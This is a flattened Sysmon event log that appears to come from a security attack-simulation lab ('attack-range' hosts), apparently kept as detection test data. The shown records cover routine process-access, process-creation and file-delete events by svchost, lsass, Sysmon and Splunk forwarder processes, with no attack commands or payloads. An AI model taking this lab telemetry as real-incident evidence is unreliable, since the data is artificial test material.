10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-11C0-6216-5E04-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C0-6216-5E04-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.984{4F8D34B0-11C0-6216-5E04-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27F5966612E2FDBDECDFEE1C98B53E9C,SHA256=49BF653221E6970DFE65603A52F81AA4F8B9407CBC80B7530B03FD13694FF879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.499{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C02FBEC8749FB285CC4073967025B62,SHA256=55AD79C701C87A638ADE39FEE59C673BA03B02769E635E8C3EE4A6E61CFC83F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.238{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.236{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.236{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.232{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.232{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.229{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.983{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A7DD2D14F47E617C65071F47D766B18,SHA256=EBBCF2EC86B41CCE490BF71C3FC98308E5F77FC3A15A4ECB147D12A592DE39B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.983{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6CBFB7FF5152E3394BBB161505B5780,SHA256=0B52215AE46ED02C2FC209A6637EEBB79D4AD2DAA53895A9D15C709B9BC4B3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:45.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A50174188A6B65BB3B93AE9D950110,SHA256=36C43BB72BEE7C5A46DAFDCBCF42FB6EDB8E8E399FDFBD569F3E056E55B58896,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.748{4F8D34B0-11C1-6216-5F04-000000003902}5202032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C1-6216-5F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.498{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.